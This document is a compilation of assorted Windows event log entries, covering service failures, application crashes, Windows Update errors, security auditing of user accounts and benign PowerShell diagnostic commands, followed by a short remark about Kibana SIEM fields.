ScriptName=
CommandPath=
CommandLine=</Data>
</EventData>
</Event>
Message:
The IO operation at logical block address 0x6ed378 for Disk 0 (PDO name: \Device\00000031) was retried.
Message:
Initialization failed because the driver device could not be created. Use the string "000000000100320000000000D71000C011010000250200C001000000000000000000000000000000" to identify the interface for which initialization failed. It represents the MAC address of the failed interface or the Globally Unique Interface Identifier (GUID) if NetBT was unable to map from GUID to MAC address. If neither the MAC address nor the GUID were available, the string represents a cluster device name.
Source:
Microsoft-Windows-PerfProc
Source:
Service Control Manager
Message:
The Remote Desktop Services service terminated due to an error The specified file cannot be found.
Source:
Microsoft-Windows-ActiveDirectory_DomainService
Message:
The directory has been configured to not enforce per-attribute authorization during LDAP add operations. Warning events will be logged, but no requests will be blocked. This setting is not secure and should only be used as a temporary troubleshooting step. Please review the suggested mitigations in the link below.
https://go.microsoft.com/fwlink/?linkid=2174032
Source:
OneApp_IGCC_WinService
Source:
Kernel-EventTracing
Message:
Starting the session "Microsoft.Windows.Remediation" failed with the following error: 0xC0000035
Message:
Message: [0301-01:57:16:346][PID:1588][TID:08432][GFDrv][error][_GetAcDcSettingIndex:04098] Goodix>>> ACSettingIndex fail
Source:
Windows Update Agent
Message:
Unable to connect: Windows is unable to connect to the Automatic Updates service and therefore cannot download and install updates according to the set schedule. Windows will continue to try to establish a connection.
Message:
License Activation (slui.exe) failed with the following error code: hr=0x803F7001
Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=UserLogon;SessionId=2
Category:
Engine Lifecycle
Message:
Stopped
Available
NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22598.1 HostId=46dc6910-488c-4202-a87a-de50e5ed56c4 HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; EngineVersion=5.1.22598.1 RunspaceId=c9ce49c6-29b1-4d28-85df-b7c49d562b06 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=
Message:
Unable to find the certificate with thumbprint 6A80C06C7E33AC535F671B3366355547C35D044B in the current computer or the certificate is missing private key. The certificate is needed to sign the outgoing token.
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..
Source:
Microsoft Windows security auditing.
Message:
The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4320
Application Name: \device\harddiskvolume2\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 224.0.0.252
Source Port: 5355
Destination Address: 167.196.121.75
Destination Port: 60070
Protocol: 17
Filter Information:
Filter Run-Time ID: 83103
Layer Name: Receive/Accept
Layer Run-Time ID: 44
Source:
Service Control Manager
Message:
A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AudioEndpointBuilder service.
Message:
The local adapter does not support an important Low Energy controller state to support peripheral mode. The minimum required supported state mask is 0x2491f7fffff, got 0x1fffffff. Low Energy peripheral role functionality will not be available.
Message:
The description for Event ID 255 from source Python Service cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Exception : (1058, 'StartService', 'The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.')
The message resource is present but the message was not found in the message table
Message:
BeyondInsight ProcessEvent returned the following error: <Return><Status>Error</Status><Details>UNEXPECTED EXCEPTION: There was no endpoint listening at https://[redacted] that could accept the message. This is often caused by an incorrect address or SOAP action. See InnerException, if present, for more details.</Details></Return>.
Source:
kernel-eventtracing
Message:
Session "ETW USB tracing" failed to start with the following error: 0xC0000022
Source:
Microsoft Windows security
Category:
User Account Management
Message:
A user account was created.
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Windows Update failed to check for updates with error 0x80072EE2
Message:
The update failed; see event log
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80004002: 2022-03 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB5011529).
Message:
The description for Event ID ( 0 ) in Source ( ThreadLib ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: ThreadLib::Thread Exception::ThumbFetcherThreadFunc.
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Ingen tilgang. ". The operation will fail with error -1032 (0xfffffbf8).
Category:
Service Monitoring
Message:
The status for driver wdboot (Windows Defender Boot Driver) remains Stopped.
Additional Driver Information:
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\wd\WdBoot.sys
Source:
DeviceManagement-Enterprise-Diagnostics-Privider
Message:
MDM ConfigurationManager: Command failure status. Configuraton Source ID: (LA 7F004E2-A009-41B4-AC78-69BCCA464D09}), Enrollment Type: (FamilySafety), CSP Name: (AppLocker), Command Type: (Clear: first phase of Delete), CSP URI:
(/Vendor/MSFT/AppLocker/FamilySafety/FamilySafetyGroup),Result:(UnknownWin32Error code: 0x86000002).
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.20348.1, time stamp: 0xdf4b0fee
Faulting module name: twinapi.appcore.dll, version: 10.0.20348.1129, time stamp: 0x5b888f7b
Exception code: 0xc0000409
Fault offset: 0x00000000000d222b
Faulting process id: 0x144c
Faulting application start time: 0x01d94a82bf78f269
Faulting application path: C:\Windows\system32\BackgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: ad3e8927-b13c-4133-97a0-a96e03efd1cc
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
Message:
BACKUP failed to complete the command BACKUP LOG model. Check the backup application log for detailed messages.
Message:
The driver detected a controller error on \Device\Raidport3.
Message:
The system session has transitioned from 16 to 18.
Reason: 220
Message:
The system session has transitioned from 16 to 18.
Reason: 220
Category:
Enregistrement/récupération
Message:
svchost (9916,R,98) TILEREPOSITORYS-1-5-18: L’erreur -1023 (0xfffffc01) s’est produite lors de l’ouverture d’un fichier journal
Message:
The server {021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} did not register with DCOM within the required timeout.
Category:
Audit User Account Management
Message:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" />
<EventRecordID>175413</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="Dummy">-</Data>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>
Source:
PowerShell (PoweShell)
Category:
Task Category (6)
Message:
Details:
ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Source:
PowerShell (PoweShell)
Category:
Task Category (6)
Message:
Provider "Function" is Started.
Details:
ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Message:
CertFindCertificateInStore failed with: (-2146885628) Cannot find object or property.
Source:
TerminalServices-RemoteConnectionManager
Message:
The RD Session Host server received large number of incomplete connections. The system may be under attack.
Source:
Application Error
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.19041.546, time stamp: 0x1d3a15e7
Faulting module name: ntdll.dll, version: 10.0.19041.3155, time stamp: 0x5212ece5
Exception code: 0xc0000374
Fault offset: 0x00000000000ff419
Faulting process id: 0xafb0
Faulting application start time: 0x01d9c3f947c55a40
Faulting application path: C:\WINDOWS\system32\BackgroundTaskHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 29e16c65-2180-4e57-9cf3-14d887083a9e
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.
Message:
The following fatal alert was received: 40.
Message:
Error code: 0xDC, Sub error code: 0x7C
Message:
Error code: 0xDC, Sub error code: 0x7C
Message:
DrvSetContext failed functionality indeterminant(pid=2112 cncmd.ext 64bit)
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) did not load:
dam
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x0000003b (0x0000000080000003, 0xfffff8063333dee3, 0xffff8308449f4dd0, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: c5f3df43-03aa-46e1-8751-ce9800ff3fa9.
Source:
ModernDeployment-Diagnostics-Provider
Message:
Autopilot.dll WIL error was reported.
HRESULT: 0x80070491
File: onecoreuap\admin\moderndeployment\autopilot\dll\dllmain.cpp, line 128
Message: NULL
Source:
Kernel-EventTracing
Message:
Session "NT Kernel Logger" failed to start with the following error: 0xC0000035
Message:
Error reading log event record. Handle specified is 927269016. Return code from ReadEventLog is 87.
Source:
CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed in authentication to policy servers with ID {########-####-####-####-72067EF2E6D9} (The user name or password is incorrect. 0x8007052e (WIN32: 1326 ERROR_LOGON_FAILURE))
Source:
Microsoft Windows security auditing
Message:
LogName=Security
EventCode=4725
EventType=0
ComputerName=domain.domain.local
SourceName=Microsoft Windows security auditing.
Type=Information
RecordNumber=2311231312
Keywords=Audit Success
TaskCategory=User Account Management
OpCode=Info
Message=A user account was disabled.
Subject:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: doamin
Account Domain: local
Logon ID: 0x1dasdwD
Target Account:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: ws-APP$
Account Domain: local
Source:
Application Error
Message:
Faulting application name: SweetAffection.exe, version: 0.0.0.0, time stamp: 0x6172bb09
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x698c
Faulting application start time: 0x01dac90f4dd836ea
Faulting application path: D:\ganestarts\SweetAffection-0.10.7-pc\SweetAffection.exe
Faulting module path: unknown
Report Id: 44bc9f5f-6f32-47ef-a0e3-4450382e76dd
Faulting package full name:
Message:
Error ID 1 happened in Windows Search recovery stage, please restart the service. If this error persists, please recreate the index.
Context: Application, SystemIndex Catalog
Details:
0x%08x (0x80040d23 - The gatherer is shutting down. (HRESULT : 0x80040d23))
Message:
The TCP/IP NetBIOS Helper service was successfully sent a stop control.
The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]
Comment: None
Source:
Application Error
Message:
Faulting application name: wuauclt.exe, version: 10.0.17763.3532, time stamp: 0x169653c2
Faulting module name: combase.dll, version: 10.0.17763.5576, time stamp: 0xe64b4fc6
Exception code: 0xc0000005
Fault offset: 0x00000000000588b8
Faulting process id: 0x7c8
Faulting application start time: 0x01db3b3a65732008
Faulting application path: C:\Windows\system32\wuauclt.exe
Faulting module path: C:\Windows\System32\combase.dll
Report Id: 822e0180-614d-4eb0-94c6-0dd5ca2335ac
Faulting package full name:
Faulting package-relative application ID:
Message:
Generate Activation Context failed for F:\Internet Downloads\McAfee VirusScan CLI Scanner\cls-w32-702-l\scan.exe.Manifest. Reference error message: The operation completed successfully.
.
Source:
Microsoft-Windows-Directory-Services-SAM
Message:
There is no message from the SIEM logs I'm seeing from. Fields unique to this Event ID (Kibana Discover):
winlog.event_data.AccountDN
winlog.event_data.AccountSID
winlog.event_data.KeyHash
Found 812 records